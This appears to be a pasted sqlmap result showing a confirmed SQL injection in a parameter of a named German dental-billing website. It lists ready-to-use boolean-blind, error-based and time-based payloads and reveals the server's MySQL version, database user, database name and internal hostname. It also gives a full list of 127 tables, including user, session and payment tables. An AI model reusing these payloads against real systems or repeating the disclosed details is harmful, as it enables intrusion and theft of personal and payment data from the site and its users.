http://www.abrechnung-zahnmedizin.de/index.php?id=70700_71538390&tx_txspihoznavi_pi1[tabName]=Analogleistungen&cHash=112d1f470853c46fa829899d753e4e46
Parameter: tx_txspihoznavi_pi1[tabName] (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=70700_71538390&tx_txspihoznavi_pi1[tabName]=-9666' OR 9736=9736#&cHash=112d1f470853c46fa829899d753e4e46 Vector: OR [INFERENCE]# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: id=70700_71538390&tx_txspihoznavi_pi1[tabName]=-4163' OR 1 GROUP BY CONCAT(0x716a716b71,(SELECT (CASE WHEN (2144=2144) THEN 1 ELSE 0 END)),0x717a787071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&cHash=112d1f470853c46fa829899d753e4e46 Vector: OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT - comment) Payload: id=70700_71538390&tx_txspihoznavi_pi1[tabName]=Analogleistungen' AND (SELECT * FROM (SELECT(SLEEP(5)))SNxx)#&cHash=112d1f470853c46fa829899d753e4e46 Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])# --- web application technology: Apache back-end DBMS: MySQL 5.0.11 banner: '5.5.40-cll-lve' current user: 'infos_aportzmdev@%' current database: 'infospitt137de1241_aportzm_dev' hostname: 'vm-spitta-1.weber-ebusiness.de' Database: infospitt137de1241_aportzm_dev [127 tables] +---------------------------------------------+ | backend_layout | | be_groups | | be_sessions | | be_users | | cache_extensions | | cache_hash | | cache_imagesizes | | cache_md5params | | cache_pages | | cache_pagesection | | cache_treelist | | cache_typo3temp_log | | cachingframework_cache_hash | | cachingframework_cache_hash_tags | | cachingframework_cache_pages | | cachingframework_cache_pages_tags | | cachingframework_cache_pagesection | | cachingframework_cache_pagesection_tags | | closure | | closure_pages | | fe_groups | | fe_groups2 | | fe_session_data | | fe_session_log | | fe_sessions | | fe_users | | hashtest | | pac_auth | | pages | | pages_language_overlay 
| | panopticlick | | panopticlick_machines | | panopticlick_user | | static_countries | | static_country_zones | | static_currencies | | static_languages | | static_markets | | static_template | | static_territories | | static_tsconfig_help | | sw_interface_log | | sys_be_shortcuts | | sys_domain | | sys_filemounts | | sys_history | | sys_language | | sys_lockedrecords | | sys_log | | sys_news | | sys_note | | sys_preview | | sys_refindex | | sys_refindex_rel | | sys_refindex_res | | sys_refindex_words | | sys_registry | | sys_template | | sys_ter | | sys_workspace | | sys_workspace_cache | | sys_workspace_cache_tags | | sys_workspace_stage | | tit_cache | | tt_content | | tt_news2 | | tt_news_pages_mm | | tt_news_pages_mm2 | | tx_cronpayment_order | | tx_cronpayment_paypal | | tx_cronpayment_verifikationsdaten | | tx_cronpayment_worldpay | | tx_extbase_cache_object | | tx_extbase_cache_object_tags | | tx_extbase_cache_reflection | | tx_extbase_cache_reflection_tags | | tx_fenestgrp | | tx_impexp_presets | | tx_macinabanners_banners | | tx_macinabanners_categories | | tx_macinabanners_stats | | tx_protokoll_shop_auftrag | | tx_realurl_chashcache | | tx_realurl_errorlog | | tx_realurl_pathcache | | tx_realurl_redirects | | tx_realurl_uniqalias | | tx_realurl_urldecodecache | | tx_realurl_urlencodecache | | tx_rsaauth_keys | | tx_rtehtmlarea_acronym | | tx_scheduler_task | | tx_shop_download_tan | | tx_shop_gutscheine | | tx_spiabrechnungsportal_abrechnungsberatung | | tx_spiauthor_data | | tx_spidentkom_users | | tx_spiheidelpay_order | | tx_spihoz_analogleistung | | tx_spihoz_metadata | | tx_spiinterface_unkown_users | | tx_spiinterfaceorderofsap_xml | | tx_spiinterfaceordersapof_pac | | tx_spiinterfaceordersapof_xml | | tx_spiinterfaceprodsapof_mat | | tx_spilandingpage_orders | | tx_spilandingpage_v1 | | tx_spilandingpage_v2 | | tx_spiloginlog | | tx_spilucenesearch_protocol | | tx_spimeinspitta_agency | | tx_spimeinspitta_agency2 | | tx_spimeinspitta_cdrom | | 
tx_spimeinspitta_newsletter_register | | tx_spimeinspitta_notizen | | tx_spimeinspitta_points_orders | | tx_spimeinspitta_print_downloads | | tx_spimeinspitta_print_downloads_stats | | tx_spisearch_extender | | tx_spishortlink_data | | tx_spistartpage_downloads | | tx_spistartpage_news | | tx_spitags_elements | | tx_staticinfotables_hotlist | | tx_templavoila_datastructure | | tx_templavoila_tmplobj | | zz_aport_abo | +---------------------------------------------+